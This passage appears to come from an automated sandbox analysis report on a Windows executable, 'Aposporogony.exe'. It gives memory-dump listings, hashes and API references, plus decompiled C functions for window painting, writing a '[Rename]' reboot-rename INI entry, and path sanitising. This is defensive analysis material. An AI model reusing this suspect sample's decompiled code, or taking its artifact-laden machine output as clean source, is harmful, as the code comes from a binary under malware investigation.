                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                      • String ID: Call$N
                                                                                                                                                                                      • API String ID: 3103080414-3438112850
                                                                                                                                                                                      • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                                                                                                      • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                                                                                                      • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 90%
                                                                                                                                                                                      			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                                                                                                                      				struct tagLOGBRUSH _v16;
                                                                                                                                                                                      				struct tagRECT _v32;
                                                                                                                                                                                      				struct tagPAINTSTRUCT _v96;
                                                                                                                                                                                      				struct HDC__* _t70;
                                                                                                                                                                                      				struct HBRUSH__* _t87;
                                                                                                                                                                                      				struct HFONT__* _t94;
                                                                                                                                                                                      				long _t102;
                                                                                                                                                                                      				signed int _t126;
                                                                                                                                                                                      				struct HDC__* _t128;
                                                                                                                                                                                      				intOrPtr _t130;
                                                                                                                                                                                      
                                                                                                                                                                                      				if(_a8 == 0xf) {
                                                                                                                                                                                      					_t130 =  *0x42a254;
                                                                                                                                                                                      					_t70 = BeginPaint(_a4,  &_v96);
                                                                                                                                                                                      					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                                                                                                                      					_a8 = _t70;
                                                                                                                                                                                      					GetClientRect(_a4,  &_v32);
                                                                                                                                                                                      					_t126 = _v32.bottom;
                                                                                                                                                                                      					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                                                                                                                      					while(_v32.top < _t126) {
                                                                                                                                                                                      						_a12 = _t126 - _v32.top;
                                                                                                                                                                                      						asm("cdq");
                                                                                                                                                                                      						asm("cdq");
                                                                                                                                                                                      						asm("cdq");
                                                                                                                                                                                      						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                                                                                                                      						_t87 = CreateBrushIndirect( &_v16);
                                                                                                                                                                                      						_v32.bottom = _v32.bottom + 4;
                                                                                                                                                                                      						_a16 = _t87;
                                                                                                                                                                                      						FillRect(_a8,  &_v32, _t87);
                                                                                                                                                                                      						DeleteObject(_a16);
                                                                                                                                                                                      						_v32.top = _v32.top + 4;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                                                                                                                      						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                                                                                                                                                      						_a16 = _t94;
                                                                                                                                                                                      						if(_t94 != 0) {
                                                                                                                                                                                      							_t128 = _a8;
                                                                                                                                                                                      							_v32.left = 0x10;
                                                                                                                                                                                      							_v32.top = 8;
                                                                                                                                                                                      							SetBkMode(_t128, 1);
                                                                                                                                                                                      							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                                                                                                                      							_a8 = SelectObject(_t128, _a16);
                                                                                                                                                                                      							DrawTextW(_t128, 0x429240, 0xffffffff,  &_v32, 0x820);
                                                                                                                                                                                      							SelectObject(_t128, _a8);
                                                                                                                                                                                      							DeleteObject(_a16);
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      					EndPaint(_a4,  &_v96);
                                                                                                                                                                                      					return 0;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t102 = _a16;
                                                                                                                                                                                      				if(_a8 == 0x46) {
                                                                                                                                                                                      					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                                                                                                                      					 *((intOrPtr*)(_t102 + 4)) =  *0x42a248;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                                                                                                                                                      			}













                                                                                                                                                                                      0x0040100a
                                                                                                                                                                                      0x00401039
                                                                                                                                                                                      0x00401047
                                                                                                                                                                                      0x0040104d
                                                                                                                                                                                      0x00401051
                                                                                                                                                                                      0x0040105b
                                                                                                                                                                                      0x00401061
                                                                                                                                                                                      0x00401064
                                                                                                                                                                                      0x004010f3
                                                                                                                                                                                      0x00401089
                                                                                                                                                                                      0x0040108c
                                                                                                                                                                                      0x004010a6
                                                                                                                                                                                      0x004010bd
                                                                                                                                                                                      0x004010cc
                                                                                                                                                                                      0x004010cf
                                                                                                                                                                                      0x004010d5
                                                                                                                                                                                      0x004010d9
                                                                                                                                                                                      0x004010e4
                                                                                                                                                                                      0x004010ed
                                                                                                                                                                                      0x004010ef
                                                                                                                                                                                      0x004010ef
                                                                                                                                                                                      0x00401100
                                                                                                                                                                                      0x00401105
                                                                                                                                                                                      0x0040110d
                                                                                                                                                                                      0x00401110
                                                                                                                                                                                      0x00401112
                                                                                                                                                                                      0x00401118
                                                                                                                                                                                      0x0040111f
                                                                                                                                                                                      0x00401126
                                                                                                                                                                                      0x00401130
                                                                                                                                                                                      0x00401142
                                                                                                                                                                                      0x00401156
                                                                                                                                                                                      0x00401160
                                                                                                                                                                                      0x00401165
                                                                                                                                                                                      0x00401165
                                                                                                                                                                                      0x00401110
                                                                                                                                                                                      0x0040116e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00401178
                                                                                                                                                                                      0x00401010
                                                                                                                                                                                      0x00401013
                                                                                                                                                                                      0x00401015
                                                                                                                                                                                      0x0040101f
                                                                                                                                                                                      0x0040101f
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                      • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                      • String ID: F
                                                                                                                                                                                      • API String ID: 941294808-1304234792
                                                                                                                                                                                      • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                                                                                                      • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                                                                                                      • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                                                                                                      • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E00406034(void* __ecx) {
                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                      				long _t12;
                                                                                                                                                                                      				long _t24;
                                                                                                                                                                                      				char* _t31;
                                                                                                                                                                                      				int _t37;
                                                                                                                                                                                      				void* _t38;
                                                                                                                                                                                      				intOrPtr* _t39;
                                                                                                                                                                                      				long _t42;
                                                                                                                                                                                      				WCHAR* _t44;
                                                                                                                                                                                      				void* _t46;
                                                                                                                                                                                      				void* _t48;
                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                      				void* _t52;
                                                                                                                                                                                      				void* _t53;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t38 = __ecx;
                                                                                                                                                                                      				_t44 =  *(_t52 + 0x14);
                                                                                                                                                                                      				 *0x426dc8 = 0x55004e;
                                                                                                                                                                                      				 *0x426dcc = 0x4c;
                                                                                                                                                                                      				if(_t44 == 0) {
                                                                                                                                                                                      					L3:
                                                                                                                                                                                      					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x4275c8, 0x400);
                                                                                                                                                                                      					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                                                                                                                      						_t37 = wsprintfA(0x4269c8, "%ls=%ls\r\n", 0x426dc8, 0x4275c8);
                                                                                                                                                                                      						_t53 = _t52 + 0x10;
                                                                                                                                                                                      						E0040640A(_t37, 0x400, 0x4275c8, 0x4275c8,  *((intOrPtr*)( *0x42a254 + 0x128)));
                                                                                                                                                                                      						_t12 = E00405EDE(0x4275c8, 0xc0000000, 4);
                                                                                                                                                                                      						_t48 = _t12;
                                                                                                                                                                                      						 *(_t53 + 0x18) = _t48;
                                                                                                                                                                                      						if(_t48 != 0xffffffff) {
                                                                                                                                                                                      							_t42 = GetFileSize(_t48, 0);
                                                                                                                                                                                      							_t6 = _t37 + 0xa; // 0xa
                                                                                                                                                                                      							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                                                                                                                                                      							if(_t46 == 0 || E00405F61(_t48, _t46, _t42) == 0) {
                                                                                                                                                                                      								L18:
                                                                                                                                                                                      								return CloseHandle(_t48);
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								if(E00405E43(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                                                                                                                                      									_t49 = E00405E43(_t38, _t21 + 0xa, "\n[");
                                                                                                                                                                                      									if(_t49 == 0) {
                                                                                                                                                                                      										_t48 =  *(_t53 + 0x18);
                                                                                                                                                                                      										L16:
                                                                                                                                                                                      										_t24 = _t42;
                                                                                                                                                                                      										L17:
                                                                                                                                                                                      										E00405E99(_t24 + _t46, 0x4269c8, _t37);
                                                                                                                                                                                      										SetFilePointer(_t48, 0, 0, 0);
                                                                                                                                                                                      										E00405F90(_t48, _t46, _t42 + _t37);
                                                                                                                                                                                      										GlobalFree(_t46);
                                                                                                                                                                                      										goto L18;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t39 = _t46 + _t42;
                                                                                                                                                                                      									_t31 = _t39 + _t37;
                                                                                                                                                                                      									while(_t39 > _t49) {
                                                                                                                                                                                      										 *_t31 =  *_t39;
                                                                                                                                                                                      										_t31 = _t31 - 1;
                                                                                                                                                                                      										_t39 = _t39 - 1;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t24 = _t49 - _t46 + 1;
                                                                                                                                                                                      									_t48 =  *(_t53 + 0x18);
                                                                                                                                                                                      									goto L17;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                                                                                                                                      								_t42 = _t42 + 0xa;
                                                                                                                                                                                      								goto L16;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					CloseHandle(E00405EDE(_t44, 0, 1));
                                                                                                                                                                                      					_t12 = GetShortPathNameW(_t44, 0x426dc8, 0x400);
                                                                                                                                                                                      					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                                                                                                                      						goto L3;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				return _t12;
                                                                                                                                                                                      			}



















                                                                                                                                                                                      0x00406034
                                                                                                                                                                                      0x0040603d
                                                                                                                                                                                      0x00406044
                                                                                                                                                                                      0x0040604e
                                                                                                                                                                                      0x00406062
                                                                                                                                                                                      0x0040608a
                                                                                                                                                                                      0x00406095
                                                                                                                                                                                      0x00406099
                                                                                                                                                                                      0x004060b9
                                                                                                                                                                                      0x004060c0
                                                                                                                                                                                      0x004060ca
                                                                                                                                                                                      0x004060d7
                                                                                                                                                                                      0x004060dc
                                                                                                                                                                                      0x004060e1
                                                                                                                                                                                      0x004060e5
                                                                                                                                                                                      0x004060f4
                                                                                                                                                                                      0x004060f6
                                                                                                                                                                                      0x00406103
                                                                                                                                                                                      0x00406107
                                                                                                                                                                                      0x004061a2
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040611d
                                                                                                                                                                                      0x0040612a
                                                                                                                                                                                      0x0040614e
                                                                                                                                                                                      0x00406152
                                                                                                                                                                                      0x00406171
                                                                                                                                                                                      0x00406175
                                                                                                                                                                                      0x00406175
                                                                                                                                                                                      0x00406177
                                                                                                                                                                                      0x00406180
                                                                                                                                                                                      0x0040618b
                                                                                                                                                                                      0x00406196
                                                                                                                                                                                      0x0040619c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040619c
                                                                                                                                                                                      0x00406154
                                                                                                                                                                                      0x00406157
                                                                                                                                                                                      0x00406162
                                                                                                                                                                                      0x0040615e
                                                                                                                                                                                      0x00406160
                                                                                                                                                                                      0x00406161
                                                                                                                                                                                      0x00406161
                                                                                                                                                                                      0x00406169
                                                                                                                                                                                      0x0040616b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040616b
                                                                                                                                                                                      0x00406135
                                                                                                                                                                                      0x0040613b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040613b
                                                                                                                                                                                      0x00406107
                                                                                                                                                                                      0x004060e5
                                                                                                                                                                                      0x00406064
                                                                                                                                                                                      0x0040606f
                                                                                                                                                                                      0x00406078
                                                                                                                                                                                      0x0040607c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040607c
                                                                                                                                                                                      0x004061ad

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                                                                                                        • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                                                                                        • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                                                                                                      • wsprintfA.USER32 ref: 004060B3
                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                                                                                                      • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                                                                                                        • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\Aposporogony.exe,80000000,00000003), ref: 00405EE2
                                                                                                                                                                                        • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                      • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                      • API String ID: 2171350718-461813615
                                                                                                                                                                                      • Opcode ID: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                                                                                                      • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                                                                                                      • Opcode Fuzzy Hash: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                                                                                                      • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                                                      			E0040667C(WCHAR* _a4) {
                                                                                                                                                                                      				short _t5;
                                                                                                                                                                                      				short _t7;
                                                                                                                                                                                      				WCHAR* _t19;
                                                                                                                                                                                      				WCHAR* _t20;
                                                                                                                                                                                      				WCHAR* _t21;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t20 = _a4;
                                                                                                                                                                                      				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                                                                                                                                                      					_t20 =  &(_t20[4]);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				if( *_t20 != 0 && E00405D34(_t20) != 0) {
                                                                                                                                                                                      					_t20 =  &(_t20[2]);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t5 =  *_t20;
                                                                                                                                                                                      				_t21 = _t20;
                                                                                                                                                                                      				_t19 = _t20;
                                                                                                                                                                                      				if(_t5 != 0) {
                                                                                                                                                                                      					do {
                                                                                                                                                                                      						if(_t5 > 0x1f &&  *((short*)(E00405CEA(L"*?|<>/\":", _t5))) == 0) {
                                                                                                                                                                                      							E00405E99(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                                                                                                                                                      							_t19 = CharNextW(_t19);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t20 = CharNextW(_t20);
                                                                                                                                                                                      						_t5 =  *_t20;
                                                                                                                                                                                      					} while (_t5 != 0);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				 *_t19 =  *_t19 & 0x00000000;
                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                      					_push(_t19);
                                                                                                                                                                                      					_push(_t21);
                                                                                                                                                                                      					_t19 = CharPrevW();
                                                                                                                                                                                      					_t7 =  *_t19;
                                                                                                                                                                                      					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                                                                                                                      						break;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					 *_t19 =  *_t19 & 0x00000000;
                                                                                                                                                                                      					if(_t21 < _t19) {
                                                                                                                                                                                      						continue;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					break;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				return _t7;
                                                                                                                                                                                      			}








                                                                                                                                                                                      0x0040667e
                                                                                                                                                                                      0x00406687
                                                                                                                                                                                      0x0040669e
                                                                                                                                                                                      0x0040669e
                                                                                                                                                                                      0x004066a5
                                                                                                                                                                                      0x004066b1
                                                                                                                                                                                      0x004066b1
                                                                                                                                                                                      0x004066b4
                                                                                                                                                                                      0x004066b7
                                                                                                                                                                                      0x004066bc
                                                                                                                                                                                      0x004066be
                                                                                                                                                                                      0x004066c7
                                                                                                                                                                                      0x004066cb
                                                                                                                                                                                      0x004066e8
                                                                                                                                                                                      0x004066f0
                                                                                                                                                                                      0x004066f0
                                                                                                                                                                                      0x004066f5
                                                                                                                                                                                      0x004066f7
                                                                                                                                                                                      0x004066fa
                                                                                                                                                                                      0x004066ff
                                                                                                                                                                                      0x00406700
                                                                                                                                                                                      0x00406704
                                                                                                                                                                                      0x00406704
                                                                                                                                                                                      0x00406705
                                                                                                                                                                                      0x0040670c
                                                                                                                                                                                      0x0040670e
                                                                                                                                                                                      0x00406715
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040671d
                                                                                                                                                                                      0x00406723
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406723
                                                                                                                                                                                      0x00406728

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Aposporogony.exe",00403480,C:\Users\user\AppData\Local\Temp\,77273420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                                                                                                      • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                                                                                                      • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Aposporogony.exe",00403480,C:\Users\user\AppData\Local\Temp\,77273420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                                                                                                      • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Aposporogony.exe",00403480,C:\Users\user\AppData\Local\Temp\,77273420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
